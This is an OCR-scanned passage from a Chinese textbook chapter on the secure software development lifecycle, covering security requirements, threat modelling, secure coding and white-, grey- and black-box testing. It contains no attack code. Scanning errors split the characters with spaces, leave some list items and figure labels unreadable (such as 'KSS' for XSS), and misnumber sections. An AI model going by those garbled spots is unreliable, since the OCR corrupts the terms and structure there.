种 突变 属性 ， 它 在 整个 设计 和 实现 的 周期 中 都 会 出 现 。 因 此 ， 要 求 软件 开发 有 事前 、 事 中 及 


事后 的 针对 性 方法 。 
在 软件 开发 的 过 程 中 ,缺陷 发 现 得 越 早 ， 修 复 费用 就 越 低 。 因 此 ， 在 整个 生命 周期 中 采 
多 个 过 程 是 非常 重要 的 。 


安全 的 软件 开发 在 项 目 开始 的 时 候 就 要 启动 ， 在 许多 软件 开发 团队 中 ， 安 全 测试 阶段 作 
为 应 用 程序 最 终 的 “安全 大 门 ”来 运行 ， 通 过 这 道 大 门 ， 允 许 或 阻止 应 用 程序 从 安逸 的 软件 
工程 环境 进入 到 不 安全 的 真实 环境 中 。 在 软件 开发 生命 周期 的 后 期 ， 随 着 引入 这 一 过 程 ， 安 
全 测试 就 背负 了 巨大 责任 : 应 用 程序 的 安全 以 及 团队 的 声誉 ， 都 依赖 于 它 。 

在 软件 已 经 实现 之 后 才 进 行 的 安全 测试 ， 比 如 找 外 部 团队 来 执行 安全 测试 ， 然 后 提交 一 
份 测试 报告 ， 这 种 方式 只 是 一 种 创可贴 式 的 补 级 解决 方案 。 对 于 安全 测试 团队 来 说 ， 一 般 只 
是 把 重点 放 在 对 软件 安全 的 测试 方法 上 ， 而 几乎 不 考虑 安全 的 软件 开发 周期 所 要 求 的 围绕 安 
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全 测试 的 相关 任务 。 然 而 ， 最 有 效 的 安全 计划 始 于 项 目的 开始 阶段 ， 要 远 早 于 任何 程序 代码 
编写 工作 ， 有 效 的 安全 过 程 在 整个 软件 开发 生命 周期 中 都 要 使 用 。 软 件 开发 各 阶段 中 的 相关 


“安全 开发 ”工作 如 图 3-1 所 示 : 
安全 风险 分 析 


产品 设计 文档 
安全 编码 规范 开发 编码 —] 


产品 代码 扫描 PSI 
产品 黑金 测 试 | | ”站 测试 


系统 发 布 


图 3-1 软件 安全 开发 生命 周期 


3.1.1 安全 的 软件 开发 周期 概述 


本 节 将 讨论 在 软件 开发 生命 周期 的 早期 介入 并 解决 安全 问题 的 重要 性 。 概 要 论述 称 作 
“安全 的 软件 开发 生命 周期 (SSDL，Secure Software Development Lifecycle)” 的 过 程 ， 其 中 包 
含 了 早期 设置 安全 质量 大 门 的 有 关内 容 。 还 将 讨论 为 什么 应 该 在 软件 开发 生命 周期 中 致力 于 
解决 安全 需求 问题 ， 而 且 在 初始 阶段 就 应 该 开始 这 方面 的 工作 。 

在 SSDL 这 一 领域 已 经 进行 了 大 量 研究 ，SSDL 描绘 了 一 种 结构 化 方法 ， 用 以 贯彻 和 实 
现 安全 的 软件 开发 。SSDL 方法 体现 了 现代 化 快速 应 用 程序 开发 研究 计划 带 来 的 好 处 。 这 类 
研究 计划 在 早期 就 开始 考虑 风险 ， 贯 穿 每 次 软件 构建 的 分 析 、 设 计 和 开发 过 程 ， 这 已 经 日 益 
成 为 一 种 流行 的 做 法 。 

遵守 SSDL， 安 全 问题 就 可 以 在 系统 的 生命 周期 早期 得 以 评估 和 解决 ， 包 括 业务 分 析 期 
间 、 每 次 软件 构建 的 需求 分 析 阶 段 以 及 设计 和 开发 阶段 。 这 种 早期 介入 方式 ， 使 安全 团队 能 
为 安全 需求 规范 、 攻 击 用 例 以 及 软件 设计 提供 质量 审查 。 整 个 团队 也 将 能 对 业务 需求 以 及 与 
其 关联 的 风险 有 更 全 面 的 理解 。 最 后 ， 这 个 团队 就 能 使 用 安全 开发 方法 、 威 胁 建 模 工作 等 设 
计 和 构建 出 最 合适 的 系统 环境 ， 产 生 更 安全 的 设计 。 

早期 介入 之 所 以 重要 ， 是 因为 需求 和 攻击 用 例 组 成 了 安全 需求 定义 和 衡量 成 功 与 否 的 基 
础 和 参考 点 。 安 全 团队 需要 对 系统 或 应 用 程序 的 功能 规范 进行 评审 。 特 别提 出 的 是 ， 至 少 要 
遵循 下 列 准则 对 功能 规范 进行 评估 : 

。 完备 性 : 评估 安全 需求 详尽 定义 的 完备 程度 ， 并 且 当 有 可 用 的 规章 所 定义 的 需求 或 

安全 策略 时 ， 还 要 验证 安全 需求 是 否 与 其 相符 。 
。 一 致 性 ， 确 保 每 项 需求 都 不 会 与 其 他 需求 相 矛 盾 。 
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。 可 行 性 ;评估 可 行 性 程度 ， 即 评估 需求 能 切实 使 用 现 有 技术 实现 的 程度 ， 并 且 这 种 
实现 不 能 超出 硬件 规格 、 项 目 预 算 和 项 目 计 划 进 度 以 及 项 目 人 员 的 技能 水 平 。 
€ 可 测试 性 ， 评 估 可 测试 性 ， 即 评估 测试 方法 能 在 多 大 程度 上 证 明 安全 需求 已 经 成 功 
实现 。 
。 优先 级 : 帮助 每 个 人 理解 就 风险 承担 而 言 的 需求 的 相对 值 。 应 使 用 一 种 度量 方式 (如 
1 一 3) 来 规定 优先 级 。 如 果 某 项 需求 对 于 系统 安全 性 来 说 是 至 关 重要 的 ， 就 需要 相应 
地 指定 其 优先 级 。 这 种 方法 需要 就 这 项 需求 综合 考虑 工程 师 的 看 法 和 与 此 相关 的 开 
销 及 技术 风险 。 
。 规章 : 要 求 这 种 安全 需求 与 本 项 目 必须 遵守 的 规章 所 规定 的 安全 需求 相符 合 。 
在 功能 规范 /需求 定义 阶段 ,应 该 确定 安全 测试 策略 。 如 果 能 时 时 考虑 到 系统 安全 的 重要 
性 ， 那 么 产品 设计 和 编码 标准 就 能 提供 合适 的 安全 测试 的 工作 平台 。 
SSDL 的 目标 就 是 确保 安全 的 软件 得 以 成 功 实 现 。 它 由 6 个 主要 部 分 组 成 : 
。 安全 原则 、 规 则 及 规章 ; 
。 安全 需求 ; 
e 架构 、 设 计 评 审 和 威胁 建 模 ; 
。 AH Aii Ja DUI 
* Hm M. KaM; 
。 判定 可 利用 性 。 
此 外 ， 还 需要 指定 一 个 有 关 安 全 部 署 应 用 程序 的 过 程 。 安 全 部 署 意味 着 软件 安装 时 使 
用 了 安全 的 默认 值 ， 文 件 许可 权限 需要 适当 地 进行 设置 ， 并 在 应 用 程序 的 配置 中 使 用 了 安 
全 设置 。 
软件 在 安全 部 署 后 ， 它 的 安全 性 就 依靠 在 软件 使 用 期 持续 地 进行 维护 来 保障 ， 这 就 需要 
有 一 个 周密 的 软件 补丁 的 管理 过 程 。 此 外 ， 对 出 现 的 安全 威胁 要 进行 评估 ， 并 且 需 要 对 安全 
漏洞 排 定 优先 级 并 加 以 管理 。 


3.1.2 ”安全 原则 、 规 则 及 规章 


安全 原则 、 规 则 及 规章 在 项 目 起 始 阶段 就 需要 考虑 ，SSDL 的 第 1 个 阶段 被 视 作 保护 性 
需求 (Umbrella Requirement). 

在 本 阶段 ， 可 以 基于 特定 的 官方 规章 来 定义 一 份 系统 范围 的 规范 ， 在 其 中 定义 将 应 用 到 
本 系统 的 安全 需求 。“Sarbanes-Oxley Act of 2002(SOX)” 就 是 这 样 一 份 公司 范围 的 规章 ， 它 
包含 了 特定 的 安全 需求 。 例 如 SOX 第 404 款 这 样 规 定 :“ 必 须 使 用 各 种 内 部 控制 来 消除 欺骗 
和 滥用 行为 ” 这 可 以 作为 基准 来 创建 考虑 到 这 种 安全 需求 的 公司 范围 安全 策略 。 基于 角色 的 
许可 权限 等 级 、 密 码 规格 和 控制 以 及 访问 等 级 控制 就 是 为 满足 这 一 特定 SOX 条 款 的 需求 而 
需要 实现 并 测试 的 内 容 。 

另 一 种 公司 范围 的 安全 规章 还 可 以 定义 成 “本 系统 需要 考虑 并 服从 HIPAA 隐私 和 安全 
规章 ”， 或 者 “我 们 必须 遵守 金融 现代 化 (The Graham-Leech-Bliley) 条 例 *， 或 者 “本 系统 需要 
满足 支付 卡 行业 数据 安全 标准 (Payment Card Industry Data Security Standard)”， 或 者 “本 系统 
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将 满足 FISMA 标准 ”， 这 样 来 指出 几 条 规定 。 有 时 会 要 求 某 个 公司 遵守 各 种 标准 ， 因 而 安全 
策略 的 创建 者 就 需要 考虑 所 有 专用 于 这 些 标准 的 需求 。 

有 些 系统 并 不 受 任何 规章 条 例 或 原则 的 影响 。 这 种 情况 下 ， 仍 应 开发 安全 策略 。 重 要 的 
是 ， 不 仅 要 以 文档 形式 记录 这 些 安全 策略 ， 还 要 通过 对 其 进行 跟踪 和 评估 来 使 其 成 为 一 种 不 
断 发 展 的 基本 原则 。 


3.1.3 ”安全 需求 


安全 需求 是 SSDL 的 第 2 个 阶段 ,在 各 类 需求 文档 中 一 种 常见 的 错误 是 忽略 了 安全 需求 ， 
以 文档 形式 记录 安全 需求 很 重要 ， 这 不 仅 是 因为 安全 需求 有 助 于 软件 设计 、 实 现 以 及 测试 
例 的 开发 ， 而 且 能 帮助 确定 技术 选择 和 风险 区 域 。 

安全 工程 师 应 坚持 要 求 将 相关 的 安全 需求 与 每 项 功能 需求 一 起 描述 ， 并 以 文档 形式 记录 
下 来 。 在 每 项 功能 需求 描述 中 ， 都 应 该 包含 名 为 “安全 需求 ”的 一 节 ， 以 在 文档 中 记录 所 有 
特定 功能 的 特有 安全 需求 ， 这 些 安全 需求 有 别 于 系统 的 安全 策略 或 安全 规范 。 安 全 需求 的 获 
取 过 程 如 图 3-2 所 示 : 


开始 


6. 迭 代 精 化 
1 识别 风 | | 2 识别 威胁 ,， 评 | | 3. 确立 安 | | 4. 提 出 安 5. 安全 需 
xus [| DEMNM 全 目标 ^ 全 需求 M 求 的 检查 


图 3-2 ”安全 需求 获得 过 程 


从 图 3-2 可 以 看 出 ， 安 全 需求 获取 主要 包含 六 个 步骤 ， 其 中 迭代 精华 步骤 是 该 过 程 的 核 
心 。 获 取 一 份 好 的 安全 需求 ， 需 要 三 个 方面 的 支持 : 安全 知识 背景 、 技 术 手段 、 获 取 工具 。 
安全 知识 背景 是 获取 安全 需求 的 基础 ， 有 利于 安全 性 保障 的 实践 ， 技 术 手段 是 获取 安全 需求 
的 关键 ， 好 的 技术 有 助 于 技术 人 员 发 现 系统 面临 的 威胁 并 提取 安全 需求 ; 获取 工具 是 安全 需 
求 获取 过 程 的 必要 支持 ， 可 视 化 、 文 档 化 、 自 动 化 或 半自动 化 分 析 工 具有 助 于 安全 分 析 人 员 
快捷 、 高 效 地 获取 需求 。 

获取 安全 需求 的 方法 主要 包括 : 基于 传统 用 例 、 基 于 问题 框架 、 反 模型 等 。 

。 基于 传统 用 例 ， 传 统 的 用 例 设计 方法 只 能 用 来 满足 功能 性 需求 分 析 ， 对 于 安全 需求 

的 特殊 性 无 法 起 到 有 效 的 作用 。 滥 用 用 例 的 方法 有 效 弥 补 了 传统 用 例 设 计 方法 的 不 
足 ， 它 主要 是 从 攻击 者 的 角度 考虑 系统 面临 的 威胁 ， 分 析 系统 存在 的 安全 漏洞 ， 建 
立 威 胁 用 例 ， 针 对 威胁 用 例 建 立 安全 需求 用 例 。 例 如 ， 我 们 可 以 从 功能 用 例 中 ， 从 
攻击 者 的 角度 考虑 分 析 安 全 漏洞 ， 从 而 建立 安全 威胁 用 例 ， 然 后 针对 威胁 用 例 设计 
安全 需求 用 例 。 

。 基于 问题 框架 : 它 是 从 攻击 者 角度 考虑 系统 安全 问题 。 该 方法 中 定义 了 “攻击 者 领 

域 ”， 用 来 表示 攻击 者 ; 定义 了 “受害 领域 ”表示 系统 遭受 威胁 的 资源 ; 定义 了 “ 反 
需求 ”概念 ， 表 示 攻 击 者 对 系统 的 需求 ， 这 样 的 需求 是 从 攻击 者 角度 出 发 ， 违 背 了 
系统 正常 、 合 法 的 需求 。 该 方法 的 本 质 是 先 获得 反 需 求 ， 然 后 制定 相应 的 安全 需求 。 
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基于 问题 框架 法 获取 威胁 的 方法 主要 有 两 种 : 
”问题 领域 内 的 现象 ， 由 于 现象 描述 缺乏 安全 性 约束 ， 使 得 安全 漏洞 可 能 显 式 或 


者 隐 式 地 存在 于 现象 中 。 
”领域 之 间 的 现象 交互 过 程 ， 其 存在 的 安全 隐患 经 常 是 外 部 攻击 的 切入 点 。 


* 反 模 型 ， 它 是 针对 面向 目标 的 需求 分 析 方法 不 能 捕获 由 恶意 的 攻击 行为 所 产生 的 障 
碍 目标 的 缺点 而 给 出 的 障碍 目标 获取 方法 和 消解 恶意 障碍 目标 的 方法 。 它 主要 包括 
以 下 几 个 步骤 : 
(1) 从 系统 中 找 出 一 些 安全 关键 性 的 对 象 并 为 它们 定义 安全 关注 点 ; 
Q) 分 析 初 始 的 反目 标 ， 识 别 出 具 有 反目 标 意图 的 攻击 者 ; 
(3) 进一步 分 析 攻击 者 的 动机 ， 尽 量 获得 攻击 者 的 真实 意图 ， 得 到 更 多 的 反目 标 ; 
(4) 精简 步骤 (3) 中 获取 的 反目 标 ， 直 到 反目 标 可 以 被 攻击 者 直接 实施 或 者 可 具体 化 为 软 
件 的 防御 漏洞 。 
(5) 根据 反目 标 ， 建 立 攻击 者 与 软件 系统 之 间 的 “ 反 模 型 ”; 
(6) 消解 反目 标 ， 主 要 采用 反目 标 弱化 、 反 目标 消除 等 手段 ， 这 些 手段 可 作为 安全 目标 。 
除了 上 述 获取 安全 需求 的 具体 实施 方法 和 步骤 之 外 ， 我 们 同时 还 要 注意 以 下 两 点 ; 
。 安全 缺点 预防 ， 是 有 助 于 在 安全 错误 传播 到 后 续 开发 阶段 之 前 检测 并 规避 这 些 安全 
错误 的 技术 和 过 程 的 应 用 。 缺 点 预防 在 需求 阶段 是 最 有 效 的 ， 在 该 阶段 ， 对 所 要 求 
的 内 容 进行 更 改 来 修正 缺点 ， 其 影响 程度 较 低 。 如 果 每 个 人 都 能 在 软件 开发 生命 所 
期 的 开始 就 保持 安全 意识 ， 他 们 就 能 帮助 识别 出 遗漏 点 、 了 矛盾 点 、 模 糊 点 以 及 其 他 
可 能 影响 项 目 安全 性 的 问题 。 
。 需求 的 可 跟踪 性 ， 确 保 每 项 安全 需求 都 以 这 样 的 方式 来 识别 一 这 项 安全 需求 可 与 
系统 中 所 有 用 到 该 需求 的 部 分 相关 联 。 对 于 这 项 需求 的 每 一 次 改动 ， 都 能 识别 系统 
中 所 有 受 这 次 改动 影响 的 部 分 。 
可 跟踪 性 还 使 相关 人 员 可 以 收集 每 项 需求 相关 的 信息 ， 以 及 当 某 项 需求 发 生变 更 时 可 能 
影响 到 的 系统 其 他 部 分 的 信息 ， 比 如 设计 、 编 码 、 测 试 等 。 当 有 需求 变更 通告 时 ， 安 全 测试 
员 能 够 确保 所 有 受 影响 的 领域 都 得 到 相应 调整 。 
下 面 是 关于 某 应 用 程序 的 安全 需求 示例 : 
1) 该 应 用 程序 将 存储 敏感 的 用 户 信息 ， 这 些 信息 必须 得 到 与 HIPAA 兼容 标准 的 保护 。 
为 达到 该 目标 ， 无 论 在 哪里 存储 ， 都 必须 使 用 强加 密 来 保护 所 有 敏感 的 用 户 数 据 。 
2) 该 应 用 程序 将 通过 可 能 不 受信 任 的 或 不 安全 的 网 络 来 传输 敏感 的 用 户 信息 。 为 保护 这 
些 数据 ， 必 须 对 通信 信道 进行 加 密 ， 以 防 窃听 ， 必 须 使 用 双向 密码 验证 来 防止 代理 攻击 。 
3) 该 应 用 程序 必须 对 合法 用 户 保持 可 用 性 。 必 须 对 远程 用 户 的 资源 使 用 进行 监视 和 限 
制 ， 以 防止 或 缓解 拒绝 服务 攻击 。 
4) 该 应 用 程序 支持 具有 不 同 权限 等 级 的 多 用 户 使 用 , 为 用 户 分 配 了 多 种 权限 等 级 , 并 定 
义 了 每 一 权限 等 级 所 授权 执行 的 操作 。 需 要 定义 并 测试 各 种 不 同 的 权限 等 级 和 绕 过 授权 攻击 
的 缓解 措施 。 
5) 该 应 用 程序 接受 用 户 的 输入 ， 并 将 使 用 SQL。 需要 定义 SQL 注入 攻击 的 缓解 措施 。 


T 
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6) 必须 对 用 户 输入 进行 长 度 和 字符 有 效 性 验证 (必须 定义 合法 的 字符 数据 元 素 )。 

7) 该 系统 需要 对 各 个 用 户 及 其 身份 鉴别 保持 跟踪 。 要 求 密码 有 关 的 涉 密 信息 必须 安全 地 
存储 。 

8) 该 应 用 程序 使 用 C 或 C++ 编写 。 代 码 必 须 以 这 样 的 方式 编写 : 始终 跟踪 并 检查 缓冲 
区 长 度 ; 用 户 输入 不 能 更 改 格式 化 字符 串 ;， 整 数值 不 允许 溢出 。 若 编译 器 支持 栈 探测 方法 ， 
那 就 用 这 种 方法 。 

9) 该 应 用 程序 以 HTML 形式 呈现 用 户 生 成 的 数据 ,因此 必须 具备 KSS 攻击 的 缓解 措施 。 

10) 该 应 用 程序 需要 记录 审计 日 志 ， 要 检验 审计 日 志 的 安全 性 。 

11) 该 应 用 程序 将 与 其 他 受信 的 应 用 程序 进行 连接 ， 必 须 对 这 些 连 接 进 行 有 效 性 检验 并 
提供 保护 。 

12) 该 应 用 程序 将 使 用 密码 系统 ， 且 生成 的 数据 必须 使 用 安全 的 随机 数 生成 器 。 

13) 该 应 用 程序 将 使 用 多 线程 或 多 进程 ， 需 要 对 其 进行 保护 以 防 出 现 竞 争 状态 。 

14) 本 软件 将 打开 文件 并 通常 通过 非 授 权 信 任 链接 来 交换 文件 数据 ， 例 如 通过 Intemet 
打开 一 个 媒体 文件 ， 对 所 有 从 这 个 文件 读 取 的 数据 不 加 信任 ， 并 对 其 进行 有 效 性 检验 。 

15) 该 应 用 程序 需要 安全 部 署 ， 即 软件 需要 使 用 安全 的 默认 值 来 安装 。 需 要 设置 适当 的 
文件 许可 权限 ， 并 在 应 用 程序 配置 中 使 用 安全 设置 。 

这 仅 是 安全 需求 很 少 的 一 些 示例 ， 安 全 技术 人 员 可 以 依据 这 些 安全 需求 开发 相应 的 安全 
测试 用 例 。 


3.4.4. 架构 、 设 计 评 审 和 威胁 建 模 


架构 和 设计 评审 以 及 威胁 建 模 代表 了 SSDL 的 第 3 个 阶段 。 

安全 从 业者 要 充分 熟悉 产品 的 体系 结构 才能 提出 更 好 、 更 完备 的 安全 策略 、 措 施 及 技术 
方面 的 建议 。 安 全 团队 及 早 介 入 可 防止 形成 不 安全 的 体系 结构 和 安全 性 欠缺 的 设计 ， 同 样 也 
有 助 于 消除 项 目 生命 周期 后 期 可 能 出 现 的 应 用 程序 行为 的 混乱 。 此 外 ， 及 早 介入 还 可 使 安全 
专家 能 够 了 解 应 用 程序 的 哪些 方面 最 关键 ， 而 从 安全 角度 来 看 哪些 要 素 风险 最 高 。 

这 种 认识 使 得 测试 人 员 能 将 重点 放 在 那些 最 重要 的 部 分 ， 避 免 优 先 测试 低 风险 部 分 ， 而 
将 高 风险 部 分 放 在 次 要 位 置 。 

软件 开发 过 程 的 时 间 和 资源 都 受到 约束 ， 在 软件 开发 生命 周期 中 ， 软 件 的 上 市 时 间 是 关 
键 因素 。 在 给 定时 间 和 资源 不 变 的 情况 下 ， 有 必要 排 定 测试 项 目的 优先 级 ， 使 得 尽 可 能 多 地 
找 出 那些 最 严重 的 安全 缺陷 。“ 威 胁 建 模 ” 就 是 用 来 排 定安 全 测试 优先 级 的 一 种 技术 。 通 过 威 
胁 建 模 ， 在 对 应 用 程序 的 设计 加 以 理解 的 基础 上 ， 可 假定 潜在 的 安全 风险 并 对 其 进行 评价 。 
然后 ， 根 据 攻击 难 易 程度 和 攻击 的 影响 严重 性 ， 将 这 些 威胁 进行 分 级 并 依次 消除 。 这 样 ， 
安全 测试 人 员 就 可 将 注意 力 集中 在 那些 攻击 难度 最 低 而 影响 最 大 的 领域 。 建 模 过 程 如 图 3-3 
所 示 : 
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Decompose 
application 


分 解 应 用 程序 


确定 威胁 


一 本 分 级 威胁 


3-3 ”软件 开发 建 模 过 程 


威胁 建 模 的 好 处 在 于 能 发 现 的 问题 与 代码 评审 及 测试 的 不 同 ， 能 发 现 较 高 层次 的 设计 问 
题 ， 而 不 是 实现 方面 的 错误 。 

通过 威胁 建 模 能 够 在 编码 实现 为 产品 之 前 ， 及 早 发 现 安全 问题 。 这 有 助 于 判断 出 应 用 程 
序 的 “风险 最 高 ”部 分 ， 这 些 都 需要 在 整个 安全 开发 工作 中 进行 非常 详细 的 审查 。 威 胁 建 模 
另 一 个 非常 有 价值 的 方面 就 是 能 让 人 有 一 种 完备 的 感觉 。 


3.1.5 “安全 编码 原则 


安全 编码 原则 是 SSDL 的 第 4 个 阶段 。 

设计 漏洞 是 一 种 设计 中 的 缺陷 ， 它 使 得 程序 不 能 安全 地 运行 ， 而 无 论 代 码 编写 者 如 何 完 
美 地 实现 了 这 个 程序 都 无 济 于 事 。 实 现 漏洞 是 在 实际 软件 代码 编写 中 导致 的 安全 性 错误 。 

静态 分 析 工 具 可 通过 扫描 源 代码 或 二 进 制 的 可 执行 文件 检测 出 许多 实现 错误 。 这 些 工具 
对 于 找 出 类 似 缓冲 区 溢出 这 样 的 问题 是 非常 有 用 的 ， 其 输出 能 帮助 开发 人 员 学 习 在 开始 时 就 
对 这 些 错 误 进 行 预 防 。 

软件 开发 人 员 和 测试 人 员 应 该 参加 有 关 培 训 课程 ， 学 习 如 何 遵守 这 些 安全 的 编码 标准 ， 
从 而 开发 安全 的 代码 。 

以 安全 的 编码 标准 做 基准 ， 测 试 人 员 能 够 开发 测试 用 例 ， 检 验 是 否 遵循 了 这 些 标准 。 

还 可 以 使 用 第 三 方 提供 的 服务 ， 将 代码 发 送 给 他 们 ， 由 他 们 来 分 析 并 找 出 其 中 的 缺点 。 
使 用 第 三 方 服务 的 好 处 是 他 们 会 从 适应 性 因素 或 用 户 需 求 方面 来 验证 代码 的 安全 性 。 由 于 这 
只 能 在 代码 开发 完毕 后 执行 ， 因 此 检验 要 提出 初始 的 标准 并 遵循 。 这 样 ， 第 三 方 就 可 以 有 所 
侧重 地 验证 这 些 标准 的 遵循 情况 ， 并 将 精力 放 在 发 现 其 他 安全 问题 上 。 
3.46 ”和 白 盒 、 灰 盒 与 黑 盒 测 试 

白 盒 、 灰 盒 与 黑 盒 测 试 是 SSDL 的 第 5 个 阶段 。 

1. 和 白 盒 测试 

白 盒 测 试 常用 于 质量 保证 领域 。 有 时 也 称 作 明 盒 测试 、 开 盒 测 试 或 信息 充分 测试 。 在 白 
盒 测 试 中 ， 对 于 测试 人 员 来 说 ， 所 有 关于 被 测 系统 的 信息 都 已 知 。 在 安全 领域 ， 这 也 可 以 认 
为 是 一 种 内 部 攻击 。 测试 人 员 能 够 访问 源 代 码 和 设计 文档 , 这 使 得 测试 人 员 能 够 高 效 地 工作 。 
他 们 可 以 进行 威胁 建 模 或 逐 行 审查 代码 、 查 找 信息 来 指导 测试 数据 的 选择 。 
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白 盒 测试 是 拷 出 安全 漏洞 最 有 效 的 方法 ， 更 多 的 信息 可 使 测试 接口 更 快 且 完整 地 生成 。 
这 同样 也 提供 了 关于 此 系统 安全 性 的 精确 印象 ， 这 是 因为 ， 这 种 印象 不 是 依靠 隐 项 式 安全 获 
得 的 ， 而 隐藏 式 安全 是 希望 攻击 者 永远 不 会 发 现 有 关系 统 工作 方式 的 信息 。 隐 项 式 安全 不 是 
真正 的 安全 , 应 该 始终 假定 所 有 系统 相关 的 信息 最 终 都 被 发 现 或 油 圳 出去。 即使 信息 被 泄露， 
设计 和 实现 完善 的 系统 依然 会 处 于 安全 状态 ， 这 就 是 优秀 的 密码 算法 能 公开 发 布 而 接受 审查 
的 原因 ， 它 们 并 不 依靠 保密 来 获得 安全 性 。 

进行 白 合 测试 之 前 进行 威胁 建 模 ， 这 可 以 揭示 软件 的 攻击 面 ， 并 将 了 解 软件 中 设置 了 哪 
些 功能 来 绥 解 这 些 攻击 面 所 带 来 的 风险 。 白 全 测试 要 测试 这 些 绥 解 措施 。 

缓解 措施 的 例子 ， 使 用 安全 机 制 来 应 对 会 话 标识 符 不 够 随机 的 问题 。 在 通过 成 助 建 模 过 
程 发 现 这 项 缓解 措施 后 ， 安 全 测试 人 员 可 检查 用 来 生成 会 话 标识 符 的 代码 ， 然 后 自动 执行 他 
建新 会 话 的 过 程 ， 并 记录 此 过 程 生成 的 这 些 会 话 标识 符 。 然 后 ， 可 对 这 些 标识 符 进行 数学 分 
析 ， 了 解 它们 是 否 真正 随机 。 

2. RAN 


黑 盒 测 试 是 指 以 局 外 人 的 身份 对 系统 进行 分 析 ， 使 用 工具 来 检测 系统 的 攻击 面 ， 并 探查 
系统 的 内 部 信息 。 在 没有 系统 内 部 知识 时 ， 测 试 人 员 要 获得 系统 的 情况 。 这 时 ， 信 息 泄露 对 
于 黑 盒 测试 人 员 来 说 尤为 重要 ， 这 是 因为 ， 相 对 于 操作 那些 没有 信息 泄露 的 程序 来 说 ， 这 些 
沪 露 出 来 的 信息 有 助 于 测试 人 员 获 得 系统 更 多 的 情况 。 

许多 测试 人 员 都 非常 信赖 黑 盒 测 试 技 术 ， 并 用 它 作为 白 盒 测试 的 补充 。 如 果 把 规格 说 明 
书 和 设计 文档 看 得 过 重 ， 测 试 人 员 就 可 能 遗漏 系统 中 未 被 正确 实现 的 或 在 文档 中 未 提 及 的 那 
些 部 分 。 这 些 规 则 之 外 的 功能 可 能 会 存在 安全 缺陷 ， 必 须 找 出 这 些 缺 陷 。 黑 盒 测 试 可 让 测试 
人 员 探 查 所 有 攻击 面 ， 并 为 那些 设计 中 没有 的 功能 生成 测试 数据 。 一 种 常见 错误 就 是 在 软件 
作为 产品 发 布 之 前 ， 没 有 去 除 那 些 仅 用 于 调试 的 命令 ， 另 一 种 常见 问题 是 在 最 后 时 刻 抛 出 未 
在 设计 文档 中 正确 记录 的 功能 。 黑 盒 测 试 可 找 出 这 些 情况 下 存在 的 缺陷 ， 而 白 盒 测 试 可 能 不 
会 注意 这 些 问题 。 

当 系统 故 意 使 用 隐蔽 式 安全 来 保护 信息 时 ， 这 种 方式 常见 于 数字 版 权 管理 DRM, Digital 
Rights Managemenb 系 统 中 ， 可 以 使 用 黑 盒 测 试 。 纯 软件 的 DRM 不 可 能 十 分 安全 ， 因 为 攻击 
者 控制 着 DRM 软件 执行 所 在 的 系统 ,DRM 厂商 能 寄予 希望 的 最 佳 方式 就 是 把 成 功 攻击 的 门 
槛 抬 到 足够 高 ， 使 攻击 者 放弃 对 其 攻击 。 由 技术 精湛 的 反 向 工程 团队 执行 的 黑 盒 测 试 往往 用 
来 测试 所 用 隐蔽 式 安全 方法 的 强度 。 这 通常 需要 专门 的 技术 ， 已 超出 了 质量 保障 团队 的 能 力 
范围 ， 因 而 进行 这 样 的 测试 代价 较 高 。 当 然 ， 对 于 DRM 系统 ， 必 须 演示 其 使 用 的 隐蔽 方法 
的 功效 。 

3. 灰 盒 测试 


理想 情况 下 ， 在 安全 测试 期 间 ， 会 同时 使 用 白 使 和 黑 盒 两 种 测试 技术 。 白 盒 测 试用 于 发 
现 有 文档 说 明 的 功能 中 的 缺陷 。 当 无 法 了 解 应 用 程序 的 内 部 信息 时 ， 使 用 黑 盒 测 试 来 找 出 缺 
陷 ， 这 种 组 合 称 为 灰 盒 测试 。 

应 用 程序 的 安全 测试 人 员 通 常 都 会 执行 灰 盒 测试 来 找 出 软件 漏洞 ， 设 计 缺 陷 和 功能 的 缺 
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陷 同等 重要 ， 都 需要 发 现 它们 。 由 于 安全 测试 人 员 可 以 使 用 源 代 码 ， 因 此 应 该 利用 这 些 代 码 
来 提高 生产 率 。 

将 软件 在 调试 器 中 运行 而 加 以 测试 是 一 种 理想 方式 ， 通 过 这 种 方式 ， 可 混合 使 用 黑 盒 测 
试 和 源 代 码 ， 从 而 使 测试 人 员 获 得 灰 盒 测 试 带 来 的 好 处 。 在 Windows 领域 ， 可 使 用 调试 符合 
和 源 代 码 。 微 软 开 发 人 员 套 件 (Microsoft Visual Studio) 是 一 种 典型 的 调试 器 ， 它 使 得 测试 人 员 
可 以 轻松 地 在 栈 和 内 存 之 间 巡 查 , 对 诸如 类 和 结构 这 样 的 复杂 变量 进行 考察 。 在 UNIX 领域 ， 
通常 使 用 gdb 执行 这 类 工作 。 

在 软件 运行 于 调试 器 中 时 ， 可 引入 常见 的 黑 盒 测 试 工具 来 用 于 执行 中 的 程序 ， 例 如 侦探 
程序 (FuzzeD 和 自动 化 的 回归 测试 套件 。 测 试 人 员 可 在 危险 的 代码 行 处 设置 断 点 ， 从 而 查看 这 
些 代码 是 否 受 程序 外 部 输入 的 影响 。 这 些 危险 的 代码 行 可 通过 代码 审查 、 简 单 地 使 用 字符 串 
查找 (grep) 或 搜索 代码 来 找 出 。 

和 危险 代码 的 一 个 例子 就 是 C 语言 在 格式 化 字符 串 中 有 %s 的 sprintf 语句 。 如 果 复 制 到 目 
标 缓冲 区 的 源 缓冲 区 太 大 ， 就 会 出 现 缓冲 区 溢出 条 件 。 但 并 不 是 有 这 种 条 件 的 sprintf 语句 都 
可 以 被 发 现 并 利用 。 灰 盒 测 试 能 找 出 那些 真正 可 被 利用 的 代码 行 。 

如 果 在 代码 开发 期 间 发 现 了 问题 ， 就 要 立即 修补 潜在 可 利用 性 的 代码 。 但 是 ， 出 于 对 打 
补丁 开销 的 考虑 ， 许 多 开发 团队 并 不 喜欢 修补 那些 已 经 发 布 的 或 者 已 经 投入 生产 的 代码 的 安 
全 缺陷 。 用 于 发 现 漏洞 的 灰 盒 方法 为 开发 团队 提供 了 关键 的 可 利用 性 信息 ， 这 可 以 帮助 他 们 
就 是 否 修补 代码 中 的 潜在 漏洞 做 出 决定 。 


3.17. ”判定 可 利用 性 


判定 可 利用 性 是 SSDL 的 第 6 个 阶段 。 

理想 情况 下 ， 在 SSDL 的 测试 阶段 发 现 的 每 个 漏洞 都 容易 修正 。 然 而 ， 依 据 漏洞 的 产生 
原因 不 同 (是 设计 错误 还 是 实现 错误 )， 解 决 这 个 问题 所 需 的 工作 量 差别 会 很 大 。 在 计量 其 带 
来 的 风险 时 ， 漏 洞 的 可 利用 性 是 一 个 重要 因素 。 可 使 用 此 信息 对 漏洞 的 修补 和 其 他 开发 需求 
